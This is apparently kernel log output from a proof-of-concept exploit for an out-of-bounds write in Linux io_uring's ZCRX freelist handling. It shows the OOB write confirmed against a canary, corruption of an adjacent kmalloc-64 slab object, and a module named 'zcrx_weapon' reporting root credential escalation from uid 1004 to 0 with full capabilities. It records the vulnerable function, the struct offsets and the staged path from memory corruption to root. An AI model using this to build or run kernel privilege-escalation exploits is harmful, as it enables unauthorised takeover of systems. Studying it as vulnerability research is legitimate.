=== OOB WRITE CONFIRMED ===

[78491.461849] zcrx_poc: ========================================
[78491.461854] zcrx_poc: io_uring ZCRX freelist OOB PoC
[78491.461854] zcrx_poc: Target: io_zcrx_return_niov_freelist()
[78491.461855] zcrx_poc: ========================================
[78491.487054] zcrx_poc: kallsyms_lookup_name @ ffffffffaa6a8624
[78491.487092] zcrx_poc: io_zcrx_return_niov @ ffffffffaac16890
[78491.487095] zcrx_poc: sizeof(fake_zcrx_area) = 192 (want 192)
[78491.487098] zcrx_poc: sizeof(fake_net_iov) = 64 (want 64)
[78491.487101] zcrx_poc: offsetof(fake_zcrx_area, freelist_lock) = 64 (want 64)
[78491.487103] zcrx_poc: offsetof(fake_zcrx_area, free_count) = 68 (want 68)
[78491.487106] zcrx_poc: offsetof(fake_zcrx_area, freelist) = 72 (want 72)
[78491.487109] zcrx_poc: Setup complete:
[78491.487111] zcrx_poc: area @ ffff8d3954cb7900 (size 192)
[78491.487115] zcrx_poc: area->nia @ ffff8d3954cb7900
[78491.487117] zcrx_poc: niov @ ffff8d39580f0600 (pp=0000000000000000)
[78491.487121] zcrx_poc: freelist @ ffff8d34296428d0 [0]=0 [1(guard)]=0xdeadbeef
[78491.487126] zcrx_poc: free_count = 1 (== num_niovs=1 → freelist FULL)
[78491.487129] zcrx_poc:
[78491.487130] zcrx_poc: *** Calling io_zcrx_return_niov(niov) with pp=NULL ***
[78491.487133] zcrx_poc: Expected path: io_zcrx_return_niov_freelist(niov)
[78491.487135] zcrx_poc: Will execute: freelist[free_count++] = niov_idx
[78491.487136] zcrx_poc: free_count=1 == num_niovs=1 → write at freelist[1] → OOB!
[78491.487139] zcrx_poc:
[78491.487141] zcrx_poc: Post-call state:
[78491.487143] zcrx_poc: free_count = 2 (was 1, now 2)
[78491.487145] zcrx_poc: freelist[0] = 0
[78491.487148] zcrx_poc: freelist[1] = 0x00000000 (canary was 0xdeadbeef)
[78491.487151] zcrx_poc: *** OOB WRITE CONFIRMED ***
[78491.487157] zcrx_poc: freelist[1] overwritten: 0xdeadbeef → 0x00000000
[78491.487162] zcrx_poc: io_zcrx_return_niov_freelist() has NO bounds check!
[78491.487164] zcrx_poc: free_count=2 overran num_niovs=1

=== ADJACENT SLAB CORRUPTION ===

[78893.619192] zcrx_esc: [✓] STAGE 1 PASS — wrote 0x1337 at OOB offset +4920
[78893.619197] zcrx_esc: ═══ STAGE 2: Adjacent slab object corruption ═══
[78893.619200] zcrx_esc: victim_obj size=64 bytes → kmalloc-64
[78893.619203] zcrx_esc: victim @ ffff8d342df4e140
[78893.619205] zcrx_esc: victim->size BEFORE = 0xaabbccdd
[78893.619208] zcrx_esc: victim->size AFTER = 0x00000007
[78893.619209] zcrx_esc: [✓] STAGE 2 PASS — victim->size corrupted: 0xAABBCCDD → 7
[78893.619210] zcrx_esc: Adjacent kmalloc-64 object OVERWRITTEN
[78893.619666] zcrx_esc: Adjacent corruption: depends on SLUB layout

=== CRED ESCALATION uid=1004→0 ===

[79406.140881] zcrx_weapon: escalating PID 119845 uid=0 → 0
[79461.679764] zcrx_weapon: escalating PID 120112 uid=1004 → 0
[79522.514488] zcrx_weapon: escalating PID 120548 uid=1004 → 0
[79522.514490] zcrx_weapon: new_cred @ ffff8d33c498af00 uid=1004→0 caps=ffffffffffffffff
[79522.514493] zcrx_weapon: *** ESCALATION COMPLETE for PID 120548 ***
[79522.514496] zcrx_weapon: uid 1004 → 0
[80004.505796] zcrx_weapon: escalating PID 122490 uid=1004 → 0
[80004.505804] zcrx_weapon: new_cred @ ffff8d33db93a180 uid=1004→0 caps=ffffffffffffffff
[80004.505812] zcrx_weapon: *** ESCALATION COMPLETE for PID 122490 ***
[80004.505819] zcrx_weapon: uid 1004 → 0